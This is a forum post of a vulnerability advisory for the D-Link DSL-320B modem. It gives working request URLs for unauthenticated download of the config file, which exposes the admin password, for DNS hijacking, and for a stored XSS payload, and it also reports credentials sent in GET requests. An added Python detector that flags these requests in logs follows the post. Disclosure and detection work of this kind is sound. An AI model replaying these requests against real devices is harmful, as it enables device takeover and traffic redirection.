net3design Posted May 14, 2013

Device: DSL-320B
Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010
Vendor URL: D-Link Deutschland | DSL-320B ADSL2+ Ethernet Modem (Annex A)

============ Vulnerability Overview: ============

Access to the Config file without authentication => full authentication bypass possible!: (1)

Request:
192.168.178.111/config.bin

Response
===<snip>====
<sysUserName value="admin"/>
<zipb enable="1"/>
<dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/>
<sysPassword value="dGVzdA=="/>
===<snip>====

=> sysPassword is Base64 encoded
=> you could use this password also for accessing the device via telnet.

Access to the logfile without authentication: (1)

Request:
192.168.178.111/status/status_log.sys

Change the DNS Settings without authentication: (1)

Request:
http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2

Stored XSS within parental control (2):
=> Parameter: set/bwlist/entry:1/hostname

Request:
http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

Again you are able to place this XSS without authentication.

Login Credentials in HTTP GET are not a good idea => use HTTP Post! (3)

Request:
http://192.168.178.111/login.xgi?user=admin&pass=admin1

Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!: (3)

Request:
http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1

============ Solution ============

Update to firmware version 1.25

Source: http://www.s3cur1ty.de/m1adv2013-018
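As an added example (not part of the post or of the advisory it quotes), a small Python detector that flags the request patterns listed above in web access logs. It assumes Common Log Format lines from a proxy or capture in front of the modem (the modem's own log format is not known from the advisory), and the sample lines are constructed; credential values are never written to the findings, only the parameter name.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoints and parameter names come from the advisory; item numbers match its (1)/(2)/(3).
UNAUTH_READ_PATHS = {"/config.bin", "/status/status_log.sys"}
UNAUTH_WRITE_PATHS = {"/advanced/adv_dns.xgi": "1", "/home/home_parent.xgi": "2"}
CRED_IN_GET = {
    "/login.xgi": {"pass"},
    "/tools/tools_admin.xgi": {"set/sys/account/user/oldpwd", "set/sys/account/user/password"},
}
# Common Log Format is an assumption; adjust the regex for your proxy's format.
CLF_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return a list of (source_ip, advisory_item, detail) findings for one log line."""
    m = CLF_RE.match(line)
    if not m:
        return []
    src, method = m.group("src"), m.group("method")
    url = urlsplit(m.group("target"))
    path = url.path
    # parse_qsl skips the empty pair produced by the leading "?&" in the advisory's URLs
    params = dict(parse_qsl(url.query, keep_blank_values=True))
    findings = []
    if path in UNAUTH_READ_PATHS:
        findings.append((src, "1", f"unauthenticated read of {path}"))
    if path in UNAUTH_WRITE_PATHS and method == "GET":
        findings.append((src, UNAUTH_WRITE_PATHS[path], f"configuration change via GET to {path}"))
    # (2) stored XSS: a parental-control hostname entry carrying markup characters
    for key, value in params.items():
        if key.startswith("set/bwlist/entry:") and key.endswith("/hostname") and re.search(r'[<>"\']', value):
            findings.append((src, "2", f"markup in {key}"))
    # (3) credentials in the query string; report the parameter name, never its value
    for key in sorted(set(params) & CRED_IN_GET.get(path, set())):
        findings.append((src, "3", f"credential parameter {key} in URL"))
    return findings

def scan(lines):
    """Flatten findings over many log lines."""
    return [f for line in lines for f in classify(line)]

# Constructed sample log lines reproducing the advisory's requests against a lab modem.
LOG_LINES = [
    '192.168.178.20 - - [14/May/2013:10:01:02 +0200] "GET /config.bin HTTP/1.1" 200 4096',
    '192.168.178.20 - - [14/May/2013:10:01:05 +0200] "GET /advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1 HTTP/1.1" 200 12',
    '192.168.178.20 - - [14/May/2013:10:01:09 +0200] "GET /home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/apply=1 HTTP/1.1" 200 12',
    '192.168.178.20 - - [14/May/2013:10:01:12 +0200] "GET /login.xgi?user=admin&pass=admin1 HTTP/1.1" 200 12',
    '192.168.178.20 - - [14/May/2013:10:02:00 +0200] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for src, item, detail in scan(LOG_LINES):
        print(f"{src} advisory item ({item}): {detail}")
```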